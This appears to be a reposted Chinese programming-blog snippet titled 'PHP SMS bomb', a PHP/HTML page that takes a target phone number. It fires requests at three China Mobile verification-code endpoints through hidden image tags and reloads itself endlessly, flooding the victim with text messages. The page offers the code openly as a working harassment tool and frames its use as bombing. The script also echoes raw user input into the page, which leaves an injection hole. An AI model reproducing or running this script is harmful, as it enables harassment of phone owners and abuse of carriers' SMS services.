龙盟编程博客 | 无障碍搜索 | 云盘搜索神器
快速搜索
主页 > web编程 > php编程 >

PHP短信炸弹

时间:2014-07-10 02:14来源:网络整理 作者:网络 点击:
分享到:
PHP短信炸弹 [代码片段(49行)]
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
    <meta http-equiv="Cache-Control" content="max-age=0" forua="true" />
    <meta http-equiv="Cache-Control" content="no-cache" />
    <meta http-equiv="Expires" content="0" />
    <link rel="stylesheet" href="http://tuvvv.com/tuvvv.css" type="text/css" />
    <title>短信炸弹</title>
</head>
<body>
    <div class="title"><a href="/">首页</a>>移动短信炸弹</div>
    <div class="nav">
        <div class="tip">
            请填写要炸的手机号码(此炸弹只有移动号才能用,是免费的,但手机必须要开启图片显示)
        </div>
    </div>
    <div class="title">
        --=手机号码=--
    </div>
    <div class="nav">
        <form method='GET' action='index.php'>
            <input name='hm' value='' size='15' maxlength='10000' /><input type="hidden" name="c" value="1" />
            <br />
            <input type='submit' name='ok' value='[开始狂炸]' />
        </form>
        <?php
            error_reporting(0);
            $v=$_GET['c'];
            $a=$v+1;
            $e=$a-1;
            $d=$_GET['hm'];
        ?>
            <div class="tip">
        <?php
            if($d>1){
                echo"<br/>OK,成功轰炸$d,第$e.次";
                echo "<img src='http://gd.12530.com/user/getvalidcode2.do?phonenumber=$d' alt=''/><img src='http://mm.10086.cn/portal/web/SmsRandomSendAction.do?msisdn=$d' alt=''/><img src='http://www.gd.chinamobile.com/login/sendSMSRND.jsp?_logonName=$d' alt=''/>";
                 echo"<meta http-equiv=refresh content='0; url=dxzd.php?hm=$d&amp;c=$a'>";
            }else{
                echo"<br/>请输入手机号码!";
            }
        ?>
    </div>
    </div>

</body>
</html>
//该片段来自于http://outofmemory.cn
精彩图集

赞助商链接